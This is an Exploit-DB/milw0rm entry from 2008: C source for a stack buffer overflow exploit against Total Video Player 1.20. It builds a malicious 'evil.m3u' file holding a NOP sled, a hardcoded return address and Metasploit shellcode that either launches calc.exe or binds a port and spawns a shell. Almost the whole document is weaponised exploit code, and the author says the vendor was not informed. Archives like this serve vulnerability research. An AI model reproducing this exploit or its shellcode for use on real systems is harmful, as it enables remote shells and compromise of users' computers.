Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow

EDB-ID:

5077

Author:

fl0 fl0w

Type:

local

Platform:

Windows

Published:

2008-02-07

/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2.
I got the ideea to look in a prior version of TVP and
surprinse vuln to ,just as V1.30.
When parsing a crafted .m3u file stack gets corrupted,due a 
long string,and causes a stack overflow.We get control of the EBP and
EIP registers.The ESP register points exactly after the retaddress position.
[corrupted stack] [EIP->points here][ESP->points here]
So do a jmp back and a JMP ESP and it points to a specific part of
the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w.
Vendor not informed yet.
Special THANKS to Expanders !!!!
*/ 
#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include<windows.h>

#define FIRST "#EXTM3U\r\n#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho\r\nD:\\"
#define LAST ".mp3\r\n"
#define OFFSET 545

#define EVILFILE "evil.m3u"

//shellcode from metasploit
char scz1[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";
char scz2[]="\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

char jmpback[] = "\xE9\xDE\xFD\xFF\xFF"; 
void Notes();

    int main()
 { 
    FILE *p;
  unsigned char *buffer;
  unsigned int offset=0;
  unsigned int retaddress=0x015EE557;
  int input=0;
  Notes();
   if((p=fopen(EVILFILE,"wb"))==NULL)
{ printf("error\n"); exit(0);
   }
   scanf("%d",&input);
   switch(input)
  {  case 1:
             buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12);
        
             memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12);
             offset=OFFSET;
     
             memcpy(buffer+offset,&retaddress,4);    
             offset=OFFSET+4;
             offset+=12;
             memcpy(buffer+offset,scz1,strlen(scz1));
             offset+=strlen(scz1); 
             memset(buffer+offset,0x00,1);
             fprintf(p,"%s%s%s",FIRST,buffer,LAST);
             fclose(p);  
                                                                         break;
    case 2:              
             buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12);
        
             memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12);
             offset=OFFSET;
     
             memcpy(buffer+offset,&retaddress,4);    
             offset=OFFSET+4;
             offset+=12;
             memcpy(buffer+offset,scz2,strlen(scz2));
             offset+=strlen(scz2); 
             memset(buffer+offset,0x00,1);
             fprintf(p,"%s%s%s",FIRST,buffer,LAST);
             fclose(p); 
                                                                          break;
  }  

 free(buffer);
 return 0;
  }
  
void Notes()
{   printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n");
    printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow\n");
    printf("Credits for finding this bug&&sploit go to fl0 fl0w\n");
    printf("SPECIAL THANKS TO EXPANDERS\n\n");
    printf("{1}Spawn Calc.exe\n");
    printf("{2}Bind port&&spanw a shell\n\n"); 
    printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
}  

// milw0rm.com [2008-02-07]